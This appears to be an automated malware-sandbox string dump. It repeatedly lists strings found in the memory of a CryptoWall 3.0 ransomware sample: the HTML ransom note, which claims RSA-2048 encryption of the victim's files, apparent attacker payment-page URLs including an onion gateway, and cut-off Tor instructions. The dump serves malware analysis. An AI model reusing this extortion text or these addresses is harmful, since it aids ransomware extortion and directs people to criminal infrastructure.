Source: restore_files_gpmus.txt236.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html33.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html303.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt241.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html255.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt166.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html39.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html131.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt228.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt50.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt361.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html47.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt248.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt38.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html355.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html270.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt250.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html373.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html346.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html50.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html221.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" 